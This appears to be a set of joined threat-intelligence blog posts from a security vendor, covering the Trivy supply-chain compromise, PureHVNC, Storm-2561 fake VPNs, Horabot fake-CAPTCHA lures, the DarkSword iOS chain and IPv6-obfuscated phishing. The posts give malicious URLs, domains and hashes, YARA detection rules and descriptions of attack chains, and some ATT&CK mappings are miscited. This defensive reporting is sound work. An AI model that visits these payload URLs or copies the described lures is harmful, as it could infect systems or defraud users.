Furthermore, the actors utilized the Internet Computer Protocol (ICP) to host C2 endpoints, as seen with the domain tdtqy-oyaaa-aaaae-af2dq-cai.raw.icp0.io. Using decentralized hosting makes it significantly harder for traditional security controls to take down the infrastructure, providing the actors with increased resilience.

Expansion to Other Frameworks

Initial investigation by the Microsoft Defender Security Research Team suggests that TeamPCP has expanded this campaign beyond Trivy. Indicators of similar activity have been detected involving Checkmarx KICS and LiteLLM. This suggests a broader strategy targeting the "Security as Code" and "AI Orchestration" layers of the modern tech stack.

MITRE ATT&CK Mapping

The techniques observed in this campaign map to the following MITRE ATT&CK framework categories:

SecLookup Detection

The SecLookup threat intelligence platform was actively monitoring the infrastructure used in this campaign. Our proprietary scanning engines identified the typosquatted aquasecurtiy.org domain and its subdomains shortly after registration. Furthermore, our behavioral analysis systems flagged the anomalous ICP-based C2 infrastructure as high-risk.

SecLookup customers were protected through:

The malicious domains were flagged as "Malicious" in our database, enabling automated blocking at the firewall and DNS levels.

Indicators of Compromise (IOCs)

Domains

aquasecurtiy.org
scan.aquasecurtiy.org
tdtqy-oyaaa-aaaae-af2dq-cai.raw.icp0.io

IP Addresses

45.148.10.122
45.148.10.212
169.254.169.254  # Link-local used for IMDS credential exfiltration
169.254.170.2    # ECS Metadata endpoint targeting

Detection Rules (YARA)

The following YARA rules can be used to scan for presence of the TeamPCP infection within your environment or CI/CD logs.

rule INDICATOR_SUSP_Trivy_Typosquat_Domain {
    meta:
        description = "Detects the typosquatted domain aquasecurtiy.org used in the TeamPCP Trivy supply chain attack"
        author = "SecLookup Threat Research"
        date = "2026-03-25"
        reference = "Trivy Supply Chain Compromise March 2026"
    strings:
        $typo1 = "aquasecurtiy.org" ascii wide
        $typo2 = "scan.aquasecurtiy.org" ascii wide
        $proper = "aquasecurity.org" ascii wide
    condition:
        (\(typo1 or \)typo2) and not $proper
}

rule MALW_TeamPCP_Trivy_Infection_Indicators {
    meta:
        description = "Detects indicators of the TeamPCP malware injection in Trivy binaries and CI/CD configs"
        author = "SecLookup Threat Research"
    strings:
        $c2_icp = "tdtqy-oyaaa-aaaae-af2dq-cai.raw.icp0.io" ascii wide
        $actor = "TeamPCP" ascii wide
        $ver = "v0.69.4" ascii wide
        $action1 = "aquasecurity/trivy-action" ascii wide
        $action2 = "aquasecurity/setup-trivy" ascii wide
    condition:
        \(c2_icp or (\)actor and (\(action1 or \)action2 or $ver))
}

Recommendations

To mitigate the risk posed by the Trivy supply chain compromise and similar CI/CD attacks, SecLookup recommends the following actions:

1. Pin GitHub Actions to Full Commit SHAs: Avoid using tags like @v1 or @v0.69.4. Instead, use the immutable commit SHA (e.g., aquasecurity/trivy-action@646b15099e...). This prevents "tag-shifting" attacks.

2. Audit CI/CD Permissions: Implement the principle of least privilege for GitHub Actions. Use the permissions: key in your YAML files to restrict GITHUB_TOKEN access to read-only where possible.

3. Rotate Secrets: If you have used Trivy version v0.69.4 or the affected GitHub Actions between March 19 and March 25, 2026, assume your CI/CD secrets (AWS keys, PATs, etc.) are compromised and rotate them immediately.

4. Update Tooling: Ensure you are using the latest patched versions of Trivy. Aqua Security has released remediated versions following the incident.

5. Monitor Metadata Access: Monitor for unusual requests to 169.254.169.254 or 169.254.170.2 originating from CI/CD runners, which may indicate an attempt to steal cloud identity credentials.

References

• Guidance for detecting, investigating, and defending against the Trivy supply chain compromise by Microsoft Defender Security Research Team, Microsoft Security Blog

Executive Summary

The campaign, first identified in early 2026, represents a tactical shift in initial access procedures. Rather than relying on direct email attachments or suspicious landing pages—which are often flagged by Secure Email Gateways (SEGs)—attackers are utilizing Google Forms to host links to malicious payloads. These forms often impersonate well-known brands and are distributed via professional networking platforms like LinkedIn. Once a victim interacts with the form and downloads the linked "project brief" or "job description," a multi-stage infection chain begins, culminating in the deployment of PureHVNC. PureHVNC is a modular .NET-based RAT capable of comprehensive system control, data exfiltration from messaging apps and crypto wallets, and persistent surveillance.

Threat Analysis: The PureHVNC Infection Chain

The sophistication of this campaign lies not in the malware itself, but in the social engineering and delivery infrastructure utilized by the threat actors.

Initial Access and Social Engineering

Attackers target professionals primarily through LinkedIn, sending direct messages that invite the recipient to review a job opportunity or a project proposal. These messages contain a link to a Google Form. Because Google is a trusted domain, these links frequently bypass automated security checks and do not trigger the same level of suspicion as a direct link to a ZIP file or an unknown domain.

The Google Forms are meticulously crafted, featuring:

• Stolen corporate logos and branding.

• Professional language consistent with HR or project management roles.

• Requests for the victim’s professional background to add a layer of perceived legitimacy.

• A "Download Brief" or "Document Link" section that redirects to external file-sharing services.

Delivery and Execution

The Google Forms link to malicious archives hosted on platforms like Dropbox or fshare.vn, often obscured by URL shorteners like goo.su. The downloaded ZIP file typically contains a heavily obfuscated loader or a malicious shortcut (LNK) file designed to appear as a PDF or Word document.

Upon execution, the loader initiates a multi-stage process:

1. De-obfuscation: The primary loader decrypts the next stage of the payload in memory to avoid signature-based detection.

2. Environment Checking: The malware checks for the presence of virtual machines, sandboxes, or specific security software.

3. Payload Injection: The final PureHVNC payload is injected into a legitimate system process (Process Hollowing).

PureHVNC Capabilities

PureHVNC belongs to the "Pure" family of malware, known for its modularity and effectiveness. As a Remote Access Trojan, it provides the operator with a "Hidden Virtual Network Computing" (HVNC) capability, allowing them to control the victim's desktop without the user's knowledge.

Key functionalities include:

• Data Theft: Targeted extraction of data from browsers (passwords, cookies), browser extensions (authenticator apps), and cryptocurrency wallets.

• Application Monitoring: Specific modules for stealing data from Telegram and Foxmail.

• System Profiling: Collection of OS details, hardware specifications, and information on connected network devices.

• Remote Command Execution: A full-featured shell for executing arbitrary commands or PowerShell scripts.

• Modular Architecture: The ability to download and execute additional plugins based on the value of the infected host.

MITRE ATT&CK Mapping

The TTPs observed in this campaign align with the following MITRE ATT&CK techniques:

SecLookup Detection

At SecLookup, our threat intelligence platform has been actively monitoring the infrastructure associated with this campaign. We are pleased to confirm that SecLookup was actively detecting and blocking the domains goo.su, fshare.vn, and the specific URL structures used in these Google Form lures prior to the widespread public disclosure of the campaign.

Our proactive scanning identified the malicious nature of these file-sharing links and the underlying IP addresses (207.148.66.14) associated with the PureHVNC C2 infrastructure. Customers utilizing SecLookup’s API integrations and threat feeds were protected from these initial access attempts via automated DNS and URL filtering.

Indicators of Compromise (IOCs)

Confirmed Malicious Domains

goo.su
fshare.vn
www.fshare.vn

IP Addresses

207.148.66.14

File Hashes (SHA-256)

b78514cfd0ba49d3181033d78cb7b7bc54b958f242a4ebcd0a5b39269bdc8357
481360f518d076fc0acb671dc10e954e2c3ae7286278dfe0518da39770484e62
e0ced0ea7b097d000cb23c0234dc41e864d1008052c4ddaeaea85f81b712d07c
d6b7ab6e5e46cab2d58eae6b15d06af476e011a0ce8fcb03ba12c0f32b0e6386
7f9225a752da4df4ee4066d7937fe169ca9f28ecddffd76aa5151fb72a57d54b
85c07d2935d6626fb96915da177a71d41f3d3a35f7c4b55e5737f64541618d37
59362a21e8266e91f535a2c94f3501c33f97dce0be52c64237eb91150eee33e3
8d6bc4e1d0c469022947575cbdb2c5dd22d69f092e696f0693a84bc7df5ae5e0
ca6bd16a6185c3823603b1ce751915eaa60fb9dcef91f764bef6410d729d60b3
1d533963b9148b2671f71d3bee44d8332e429aa9c99eb20063ab9af90901bd4d
a92f553c2d430e2f4114cfadc8e3a468e78bdadc7d8fc5112841c0fdb2009b2a
ea4fb511279c1e1fac1829ec2acff7fe194ce887917b9158c3a4ea213abd513a
b18e0d1b1e59f6e61f0dcab62fecebd8bcf4eb6481ff187083ea5fe5e0183f66
4957b08665ddbb6a2d7f81bf1d96d252c4d8c1963de228567d6d4c73858803a4
fe398eb8dcf40673ba27b21290b4179d63d51749bc20a605ca01c68ee0eaebbc

URLs

https://tr..ee/R9y0SK
https://www.fshare.vn/file/F57BN4BZPC8W
https://dl.dropbox.com/scl/fi/52sgtk50j285hmde2ycry/Overview-of-the-MSI-Accounting-Project.rar?rlkey=9qmunvcp8oleeycld08gqwup9
https://goo.su/CmLknt7

Detection Rules

YARA Rules

The following YARA rules can be used to scan for PureHVNC binaries and campaign-specific markers within your environment.

rule Malware_PureHVNC_Generic {
    meta:
        description = "Detects generic PureHVNC RAT identifiers and capabilities based on campaign report"
        author = "SecLookup Threat Intelligence"
        date = "2024-05-22"
    strings:
        $name1 = "PureHVNC" ascii wide
        $name2 = "PureLogs" ascii wide
        $cap1 = "Foxmail" ascii wide
        $cap2 = "Telegram" ascii wide
        $cap3 = "crypto" ascii wide
        $cap4 = "wallet" ascii wide
        $net = "MSIL" ascii
    condition:
        uint16(0) == 0x5A4D and (any of (\(name*)) or (all of (\)cap*) and $net)
}

rule PureHVNC_Campaign_Indicators {
    meta:
        description = "Detects indicators related to the PureHVNC delivery campaign via Google Forms and file sharing sites"
        author = "SecLookup Threat Intelligence"
        date = "2024-05-22"
    strings:
        $url1 = "goo.su" ascii wide
        $url2 = "fshare.vn" ascii wide
        $lure1 = "job interview" ascii wide nocase
        $lure2 = "project brief" ascii wide nocase
        $lure3 = "financial document" ascii wide nocase
    condition:
        any of (\(url*) and any of (\)lure*)
}

Recommendations

To defend against this and similar campaigns, SecLookup recommends the following actions:

1. Enhance Web Filtering: Implement strict URL filtering to block known malicious domains and common URL shorteners used in malware delivery (e.g., goo.su). Restrict access to personal file-sharing sites (e.g., fshare.vn) from corporate networks unless there is a verified business need.

2. User Awareness Training: Educate employees on the dangers of clicking links within unsolicited LinkedIn messages or Google Forms. Emphasize that legitimate recruitment processes rarely require downloading ZIP files from third-party file-sharing sites.

3. Monitor for Persistence: Use EDR (Endpoint Detection and Response) tools to monitor for the creation of unusual scheduled tasks or registry keys, which are common persistence mechanisms for PureHVNC.

4. Process Monitoring: Monitor for process hollowing or injection into common Windows binaries (e.g., svchost.exe, explorer.exe).

5. Audit Crypto-Assets: For organizations handling cryptocurrency, ensure that wallets are protected with hardware-based keys and that browser-based wallet extensions are strictly audited.

References

• That “job brief” on Google Forms could infect your device by Malwarebytes Labs, Malwarebytes Labs

In a sophisticated campaign targeting enterprise environments, the threat actor Storm-2561 has resumed operations by leveraging Search Engine Optimization (SEO) poisoning to distribute malicious VPN clients. Active since May 2025, this cybercriminal group has refined its tactics to bypass user skepticism and detection mechanisms. By manipulating search engine rankings to redirect users searching for legitimate enterprise software to malicious ZIP files, Storm-2561 deploys digitally signed trojans that masquerade as trusted VPN clients. These malicious payloads are designed to harvest VPN credentials, posing a significant risk to organizations relying on remote access solutions. As security professionals, it is critical to understand the attack chain, the specific infrastructure utilized, and how SecLookup is actively mitigating this threat.

Threat Analysis

The Storm-2561 attack chain represents a blend of social engineering and supply chain compromise. Unlike generic phishing attempts, this campaign targets users with high intent—individuals actively searching for specific enterprise VPN solutions. This intent reduces the user's hesitation to download and execute software, creating a high-success-rate vector for credential theft.

TTPs and Attack Chain

The campaign begins with SEO Poisoning (T1566.001 - Spearphishing Link). Attackers register domains that closely resemble legitimate software vendors, utilizing slight misspellings or geographic suffixes (e.g., forticlient-vpn.de instead of forticlient.de). When users search for standard enterprise software, these malicious domains often rank higher in search results than the legitimate vendor sites.

Once a user clicks the malicious link, they are directed to a landing page hosting a malicious ZIP file. According to the Microsoft Threat Intelligence report, these files are hosted on GitHub repositories (which have since been taken down) and attacker-controlled websites.

The critical phase of this attack involves Code Signing Abuse (T1546.004). The extracted installer is a trojan that is digitally signed. While the attacker used a legitimate certificate, it has since been revoked. This digital signature is intended to bypass standard operating system warnings and heuristic antivirus engines, which often flag unsigned executables as suspicious. By leveraging a trusted signature, the malware gains a "halo effect," making it appear legitimate to the user and the system's security stack.

Technical Implementation

The malware payload, once executed, behaves exactly like a standard VPN client. However, instead of establishing a secure tunnel, it captures the user's credentials—typically usernames and passwords—and exfiltrates them to a C2 (Command and Control) server. This technique is particularly dangerous because it targets users who are actively trying to access their corporate networks, making them vulnerable to credential harvesting during a time of high urgency.

MITRE ATT&CK Mapping

• T1566.001: Spearphishing Link: Attackers manipulate search results to deliver malicious payloads.

• T1195: Supply Chain Compromise: The distribution mechanism involves exploiting the trust associated with software vendors.

• T1546.004: Event Triggered Execution via Code Signing: The malware utilizes a revoked certificate to evade detection and gain execution privileges.

Indicators of Compromise (IOCs)

SecLookup's threat intelligence platform has analyzed the infrastructure associated with this Storm-2561 campaign. We have identified numerous malicious domains, files, and infrastructure elements designed to facilitate this credential theft campaign. All of the following IOCs have been confirmed malicious.

Malicious Domains

cisco-secure-client.es
forticlient-vpn.de
sophos-connect.org
myconnection.pro
sonicwall-netextender.nl
pn-connection.pro
forticlient-vpn.it
ivanti-vpn.org
forticlient.co.uk
forticlient-vpn.fr
forticlient.ca
ivanti-secure-access.de

IP Addresses

194.76.226.93

File Hashes (SHA-256)

862f004679d3b142d9d2c729e78df716aeeda0c7a87a11324742a5a8eda9b557
26db3fd959f12a61d19d102c1a0fb5ee7ae3661fa2b301135cdb686298989179
85c4837e3337165d24c6690ca63a3274dfaaa03b2ddaca7f1d18b3b169c6aac1
8ebe082a4b52ad737f7ed33ccc61024c9f020fd085c7985e9c90dc2008a15adc
57a50a1c04254df3db638e75a64d5dd3b0d6a460829192277e252dc0c157a62f
eb8b81277c80eeb3c094d0a168533b07366e759a8671af8bfbe12d8bc87650c9
cfa4781ebfa5a8d68b233efb723dbde434ca70b2f76ff28127ecf13753bfe011
6129d717e4e3a6fb4681463e421a5603b640bc6173fb7ba45a41a881c79415ca
44906752f500b61d436411a121cab8d88edf614e1140a2d01474bd587a8d7ba8
6c9ab17a4aff2cdf408815ec120718f19f1a31c13fc5889167065d448a40dfe6
98f21b8fa426fc79aa82e28669faac9a9c7fce9b49d75bbec7b60167e21963c9

URLs

https://github.com/latestver/vpn/releases/download/vpn-client2/VPN-CLIENT.zip

SecLookup Detection

SecLookup is actively monitoring the threat landscape and has integrated these IOCs into our threat intelligence platform. We have successfully detected and blocked the following malicious domains (cisco-secure-client.es, forticlient-vpn.de, sophos-connect.org, myconnection.pro, sonicwall-netextender.nl, pn-connection.pro, forticlient-vpn.it, ivanti-vpn.org, forticlient.co.uk, forticlient-vpn.fr, forticlient.ca, ivanti-secure-access.de) and their associated file hashes to protect our users from this credential theft campaign. Our systems are configured to prevent connections to these IPs and block the execution of the identified malicious binaries.

Recommendations

To defend against the Storm-2561 campaign and similar SEO poisoning attacks, we recommend the following security measures:

1. Verify Official Sources: Always verify software downloads through official vendor websites. If you cannot find the software on the official vendor's site, do not download it from search results.

2. Check Certificate Revocation: Even if an executable is digitally signed, verify that the certificate is not revoked. You can do this using tools like certutil -verify or by checking the certificate chain in your endpoint protection software.

3. Monitor Network Traffic: Use network monitoring tools to detect connections to domains that closely resemble legitimate software vendors but are not on your allowlist.

4. Enable Phishing-Resistant MFA: Ensure that Multi-Factor Authentication (MFA) is enforced for VPN access. If credentials are stolen, MFA adds a critical layer of defense, preventing unauthorized access even if the user's password is compromised.

5. Endpoint Detection and Response (EDR): Ensure your EDR solution is configured to detect and block the execution of unsigned or suspicious binaries, and monitor for credential dumping activities.

References

• Storm-2561 uses SEO poisoning to distribute fake VPN clients for credential theft by Microsoft Threat Intelligence and Microsoft Defender Experts, Microsoft Security Blog

At SecLookup, our mission is to provide proactive intelligence against emerging threats. Our threat intelligence platform was actively detecting and blocking the infrastructure associated with this campaign well before its public disclosure, ensuring our users remained protected against these deceptive tactics. In this post, we will break down the technical nuances of the attack chain, the threat actor's tactics, and the specific indicators identified during our analysis.

Executive Summary

The Horabot campaign, dubbed "Sapecar" by researchers at Kaspersky GReAT, represents a significant evolution in social engineering-based malware delivery. The campaign primarily targets Mexican financial institutions and their customers. The attack utilizes a deceptive "Fake CAPTCHA" lure that tricks users into executing malicious commands manually via the Windows Run dialog—a technique increasingly favored by modern stealers and bankers to bypass traditional browser-based security controls. Once executed, the infection chain deploys a PowerShell-based downloader that eventually leads to the installation of Horabot, a Trojan capable of stealing sensitive financial data and turning the victim's machine into a distribution node for further phishing campaigns.

Threat Analysis: The "Sapecar" Kill Chain

The Horabot attack chain is a masterclass in Living-off-the-Land (LotL) techniques combined with psychological manipulation. By leveraging legitimate Windows utilities, the adversary minimizes their file-based footprint and avoids triggering basic signature-based detection.

Stage 1: Social Engineering and the Fake CAPTCHA

The attack begins with a phishing email or a malicious redirection to a landing page designed to mimic a standard security verification screen. These pages are often hosted on newly registered domains such as evs.grupotuis[.]buzz.

Unlike traditional drive-by downloads, this campaign utilizes a "manual execution" lure. The page displays a fake CAPTCHA and instructs the user to:

1. Press Win + R to open the Windows Run dialog.

2. Paste a pre-copied malicious command (already in the user's clipboard via JavaScript).

3. Press Enter.

This tactic effectively bypasses many web-filtering and sandbox solutions because the malicious action is initiated by the user through a legitimate system component, rather than being directly downloaded or executed by the browser.

Stage 2: Execution via MSHTA and PowerShell

The command pasted into the Run dialog typically invokes mshta.exe, a legitimate Windows utility used to execute Microsoft HTML Applications (HTAs). The command points to a remote URL, such as https://evs.grupotuis[.]buzz/0capcha17/, which serves a malicious script.

This script initiates a PowerShell sequence that performs environment checks, establishes persistence, and downloads the next stage of the malware. The use of mshta.exe is a classic MITRE ATT&CK technique (T1218.005) used to proxy the execution of malicious code through a trusted binary.

Stage 3: The Horabot Payload

The final payload is a sophisticated banking Trojan designed specifically for the Mexican market. Its primary capabilities include:

• Credential Harvesting: Intercepting login credentials for online banking portals.

• Form Grabbing: Capturing data entered into web forms.

• Email Spreading: Accessing the victim's Outlook or webmail to send out further phishing lures to contacts, facilitating lateral movement across organizations and social circles.

• Remote Access: Providing the attacker with a backdoor to the infected system.

The "Sapecar" campaign is notable for its use of diverse infrastructure, including domains like aufal.filevexcasv[.]buzz and cgf.midasx[.]site, which were used for command-and-control (C2) and payload delivery.

MITRE ATT&CK Mapping

SecLookup Detection

The SecLookup threat intelligence platform proactively identified the infrastructure used in this Horabot campaign. Our systems flagged the following domains as malicious based on their registration patterns, hosting providers, and association with known malware distribution scripts:

• aufal.filevexcasv[.]buzz

• cgf.midasx[.]site

• thea.gruposhac[.]space

• labodeguitaup[.]space

• cfg.brasilinst[.]site

• lifenews[.]pro

Indicators of Compromise (IOCs)

Malicious Domains

aufal.filevexcasv.buzz
cgf.midasx.site
thea.gruposhac.space
labodeguitaup.space
cfg.brasilinst.site
lifenews.pro
grupotuis.buzz
midasx.site
gruposhac.lat
facturastbs.shop
brasilinst.site

IP Addresses

64.177.80.44

File Hashes (MD5)

c882d948d44a65019df54b0b2996677f
6272ef6ac1de8fb4bdd4a760be7ba5ed
4caa797130b5f7116f11c0b48013e430

Malicious URLs

https://evs.grupotuis.buzz/0capcha17/DMEENLIGGB/GRXUOIWCEKVX
https://thea.gruposhac.space/0out0408
https://cgf.facturastbs.shop/0725/a/home
https://cfg.brasilinst.site/a/br/logs/index.php?CHLG
https://aufal.filevexcasv.buzz/on7all/index15.php
https://pdj.gruposhac.lat/g1/gerador.php
https://pdj.gruposhac.lat/g1/
https://pdj.gruposhac.lat/g1/auxld1
https://upstar.pics/a/08/150822/up/up
https://labodeguitaup.space/a/08/150822/au/au

Recommendations

To defend against Horabot and similar social engineering-led campaigns, SecLookup recommends the following actions:

1. Block LOLBAS Execution: Restrict the execution of mshta.exe, powershell.exe, and cmd.exe for standard users where not operationally required. Monitor for mshta.exe making external network connections.

2. User Awareness Training: Educate employees on the dangers of the Windows Run dialog (Win+R). Emphasize that legitimate websites—especially security verification pages—will never ask a user to paste commands into the Run dialog.

3. Endpoint Monitoring: Deploy EDR solutions to alert on suspicious parent-child process relationships, such as a web browser or the Run dialog launching mshta.exe.

4. Implement DNS Filtering: Use a threat intelligence-driven DNS filtering service to block access to known malicious domains like those identified in the Horabot infrastructure.

5. Audit Clipboard Operations: While difficult to implement at scale, security teams should be aware that web-based "copy-to-clipboard" events are being weaponized.

References

• The SOC Files: Time to “Sapecar”. Unpacking a new Horabot campaign in Mexico by Domenico Caldarella, Mateus Salgado, Securelist (Kaspersky GReAT)

At SecLookup, our threat research team has been actively tracking the infrastructure associated with DarkSword. Our platform successfully identified and blocked the core delivery domains—including static.cdncounter[.]net

Executive Summary

DarkSword is an iOS full-chain exploit that leverages six distinct vulnerabilities to bypass the robust security architecture of modern Apple devices. Active since at least November 2025, the exploit chain targets iOS versions 18.4 through 18.7. What makes DarkSword particularly notable is its adoption by multiple independent threat groups, including the suspected Russian espionage group UNC6353. The campaign has a global reach, with confirmed targets in Saudi Arabia, Turkey, Malaysia, and Ukraine. Following a successful exploit, attackers deploy one of three specialized malware families: GHOSTBLADE, GHOSTKNIFE, or GHOSTSABER.

Threat Analysis: The DarkSword Lifecycle

The DarkSword exploit chain is a masterpiece of offensive engineering, designed to bypass the multiple layers of the iOS sandbox and kernel protections. Its lifecycle typically follows a "watering hole" or highly targeted phishing model.

Initial Access and Delivery

Attackers deploy DarkSword primarily through drive-by compromise (MITRE ATT&CK T1189). In several observed campaigns, legitimate websites were compromised to host malicious JavaScript. This script, often masquerading as a benign tracking or widget utility (e.g., widgets.js), performs initial environment fingerprinting to ensure the target device is a vulnerable iPhone or iPad running the targeted iOS versions (18.4–18.7).

One of the primary delivery domains identified is static.cdncounter[.]net. This domain was used to serve the initial stage of the exploit, acting as a gateway for the more complex stages of the attack.

The Exploit Chain

The DarkSword chain utilizes six vulnerabilities. While the specific CVEs vary based on the target’s patch level, the chain generally follows this sequence:

1. Remote Code Execution (RCE): A vulnerability in WebKit is used to gain initial execution within the browser sandbox.

2. Sandbox Escape: Two vulnerabilities are typically used to break out of the WebContent process.

3. Kernel Elevation of Privilege (EoP): Three vulnerabilities, including memory corruption bugs in the iOS kernel, are used to gain read/write primitives and eventually full kernel-level execution.

Post-Compromise: The "GHOST" Malware Families

Once the kernel is compromised, the attackers deploy a final-stage payload. DarkSword has been observed delivering three distinct malware families, likely tailored to the specific goals of the threat actor using the chain:

• GHOSTBLADE: A modular implant focused on data exfiltration from third-party messaging apps (Signal, WhatsApp, Telegram).

• GHOSTKNIFE: A streamlined surveillance tool optimized for persistence and credential harvesting from the iOS Keychain.

• GHOSTSABER: A sophisticated backdoor with advanced capabilities for real-time location tracking and microphone/camera activation.

Actor Attribution and Proliferation

The most striking aspect of DarkSword is its widespread use. Historically, full-chain zero-day exploits were the exclusive domain of a single elite actor. However, DarkSword mirrors the "Coruna" exploit kit model, where a central developer (likely a commercial surveillance vendor) sells the exploit to multiple clients.

UNC6353, a group linked to Russian intelligence operations, has been observed integrating DarkSword into their watering hole operations targeting Ukrainian entities. Simultaneously, the same exploit chain was detected in campaigns targeting high-profile individuals in the Middle East and Southeast Asia, attributed to different, likely state-aligned, commercial entities. This "exploit-as-a-service" model significantly lowers the barrier to entry for state-sponsored espionage.

MITRE ATT&CK Mapping

SecLookup Detection

SecLookup’s proactive threat intelligence platform was actively detecting and blocking the infrastructure associated with DarkSword. The domain static.cdncounter[.]net was flagged as malicious by our scanners due to its involvement in suspicious JavaScript delivery and its connections to known exploit delivery patterns.

Indicators of Compromise (IOCs)

Malicious Domains

static.cdncounter[.]net
snapshare[.]chat

IP Addresses

62.72.21.10
72.60.98.48

File Hashes (SHA-256)

2e5a56beb63f21d9347310412ae6efb29fd3db2d3a3fc0798865a29a3c578d35

URLs

https://snapshare[.]chat/<redacted>
https://static.cdncounter[.]net/widgets.js?uhfiu27fajf2948fjfefaa42
https://static.cdncounter[.]net/assets/index.html

Email Addresses

anotherresource@frame.html

Detection Rules

YARA Rules

The following rules can be used to scan for DarkSword toolmarks in memory or extracted payloads.

rule iOS_DarkSword_Payload_Toolmarks {
    meta:
        description = "Detects toolmarks and malware family names associated with the DarkSword iOS exploit chain."
        threat_actor = "UNC6353"
        malware_family = "GHOSTBLADE, GHOSTKNIFE, GHOSTSABER"
    strings:
        $s1 = "DarkSword" ascii wide
        $s2 = "GHOSTBLADE" ascii wide
        $s3 = "GHOSTKNIFE" ascii wide
        $s4 = "GHOSTSABER" ascii wide
    condition:
        (uint32(0) == 0xfeedface or uint32(0) == 0xcefaedfe or uint32(0) == 0xfeedfacf or uint32(0) == 0xcffaedfe) and (2 of them)
}

rule DarkSword_Delivery_Infrastructure {
    meta:
        description = "Detects references to the DarkSword delivery domain in files or memory."
    strings:
        $url = "static.cdncounter.net" ascii wide nocase
    condition:
        $url
}

Recommendations

To mitigate the risk of DarkSword and similar iOS exploit chains, SecLookup recommends the following actions:

1. Update Immediately: Apple has released patches for the vulnerabilities leveraged by DarkSword. Ensure all iOS devices are updated to version 18.8 or higher (and ideally the latest version, 26.3, as mentioned in the findings).

2. Enable Lockdown Mode: For high-risk individuals (journalists, activists, government officials), Apple’s "Lockdown Mode" significantly reduces the attack surface by disabling complex web features and blocking certain message attachments that are often used in these exploit chains.

3. Network Monitoring: Block all traffic to the IOCs listed above. Implement DNS filtering to prevent devices from communicating with known exploit delivery domains like cdncounter[.]net.

4. Endpoint Security: Utilize mobile threat defense (MTD) solutions that can detect anomalous process behavior or unauthorized kernel modifications.

References

• The Proliferation of DarkSword: iOS Exploit Chain Adopted by Multiple Threat Actors by Google Threat Intelligence Group, Mandiant

A sophisticated phishing campaign targeting United Healthcare beneficiaries has recently resurfaced, utilizing a deceptive lure involving a premium Oral-B toothbrush to harvest sensitive Personally Identifiable Information (PII) and credit card details. What distinguishes this campaign from previous iterations is the use of IPv6-mapped IPv4 addresses to obfuscate malicious destination URLs. By replacing standard domain names with IPv6 literals—specifically using the ::ffff: notation—threat actors are evading basic link scanners and confusing analysts attempting to trace the traffic. SecLookup is actively monitoring this threat and has successfully identified and blocked the associated infrastructure. This post details the technical mechanisms of this evasion technique, the indicators of compromise (IOCs), and defensive recommendations for SOC teams and end-users.

Threat Analysis

The Lure: Baiting and Impersonation

The campaign leverages T1566.001 (Phishing: Spearphishing Link) by impersonating a trusted entity, United Healthcare. The lure, a "premium Oral-B iO toothbrush," is a classic example of T1566.002 (Spearphishing Link with File Attachment), relying on the psychological principle of "Baiting" (offering something desirable for free to gain access to a system or network). This technique lowers the victim's guard, making them more likely to overlook security warnings.

The Evasion: IPv6-Mapped Addressing

Traditionally, phishers have relied on Azure Blob Storage or obfuscated domains. This campaign has pivoted to a more technical evasion method: IPv6-mapped IPv4 addresses.

In the provided examples, malicious links previously looked like standard URLs pointing to Azure storage. Now, they utilize the format http://[::ffff:5111:8e14]/. To the untrained eye, this looks like a valid URL, but the brackets [...] indicate an IPv6 literal. The ::ffff: prefix is a standard mechanism used in IPv6 to represent IPv4 addresses within the IPv6 address space.

Technical Breakdown

The threat actor converts an IPv4 address into an IPv6 format to hide the underlying destination IP. Let's analyze the hex string 5111:8e14 provided in the example:

1. Hexadecimal Conversion: The string is split into two 16-bit segments: 5111 and 8e14.

2. Byte Unpacking: The last 32 bits (the x:y part) are treated as four bytes.

   • 0x51 = 81 (Decimal)

   • 0x11 = 17 (Decimal)

   • 0x8e = 142 (Decimal)

   • 0x14 = 20 (Decimal)

3. Final IP: This results in the IPv4 address 81.17.142.20.

By routing traffic through this IPv6 mapping, the attackers obscure the IP address from basic URL inspection tools and some web proxies, forcing analysts to perform manual hex-to-decimal conversions to identify the malicious server.

The Infrastructure

The victims are directed to fast-rotating landing pages. The ultimate goal is not the toothbrush but the theft of credit card information under the guise of paying a "shipping fee" or confirming eligibility. Once the victim submits their card details, the data is transmitted to a backend server controlled by the threat actor.

MITRE ATT&CK Reference

• T1566.001: Phishing: Spearphishing Link

• T1071.001: Application Layer Protocol: Web Traffic

• T1548.001: Abuse Elevation Control Mechanism: SIDHijack (Potential) / Proxy (Mapping IPv6 to bypass restrictions)

Indicators of Compromise (IOCs)

SecLookup's threat intelligence platform has identified the following malicious infrastructure associated with this campaign. These indicators should be blocked immediately in network firewalls and email security gateways.

Domains

redirectofferid[.]pro

IP Addresses

81.17.142.20
15.204.145.84
81.17.142.40

Malicious URL Pattern

http://[::ffff:5111:8e14]/

(Note: The hex string 5111:8e14 can be converted to the IP 81.17.142.20 as detailed above. Similar patterns using different hex values will map to other IPs in the attacker's infrastructure.)

SecLookup Detection

SecLookup is actively detecting and blocking this threat. Our threat intelligence platform has updated our blocking lists to include the malicious domain redirectofferid[.]pro and the associated IP addresses 81.17.142.20, 15.204.145.84, and 81.17.142.40.

Recommendations

For Security Teams

1. Update Blocking Rules: Ensure your email security gateway (ESG) and next-generation firewall (NGFW) include the IPs listed in the IOCs section.

2. Monitor for IPv6 Literals: Configure SIEM alerts to flag for unusual URL patterns containing square brackets [] or the ::ffff: prefix, as these are indicators of this specific obfuscation technique.

3. Domain Reputation: Block the domain redirectofferid[.]pro immediately.

For End-Users

1. Verify the Source: Always check the sender's email address carefully. Scammers often use slight misspellings or variations of legitimate domains (e.g., united-healthcare-support[.]com instead of unitedhealthcare[.]com).

2. Hover Before Clicking: Before clicking a link, hover your mouse over it to see the actual destination URL. If you see a long string of characters that doesn't match the sender's domain, do not click.

3. Do Not Pay Fees: If you receive a message claiming you need to pay a small shipping fee for a "free" item, it is a scam. Legitimate companies do not require payment to ship free gifts.

4. Immediate Action if Compromised:

   • Contact your bank or credit card issuer immediately to cancel the card.

   • Dispute any unauthorized charges.

   • Run a full system scan with a reputable security product.

References

• Phishers hide scam links with IPv6 trick in “free toothbrush” emails by Malwarebytes Labs, Malwarebytes Labs

Executive Summary

The latest Vidar campaign demonstrates a sophisticated use of the "ClickFix" or "Fake CAPTCHA" technique. Rather than relying on automated browser vulnerabilities which are frequently patched, attackers exploit human psychology. Visitors to compromised WordPress sites are presented with a highly convincing "Verifying you are human" page. Under the guise of solving a CAPTCHA, the user is instructed to copy and paste a command into their Windows Run dialog or PowerShell terminal. This command initiates a chain of events that utilizes built-in Windows binaries—specifically mshta.exe—to download and execute the Vidar infostealer. SecLookup has been actively tracking this infrastructure and confirmed the malicious nature of key domains, such as walwood.be, associated with these delivery operations.

Threat Analysis: The ClickFix Evolution

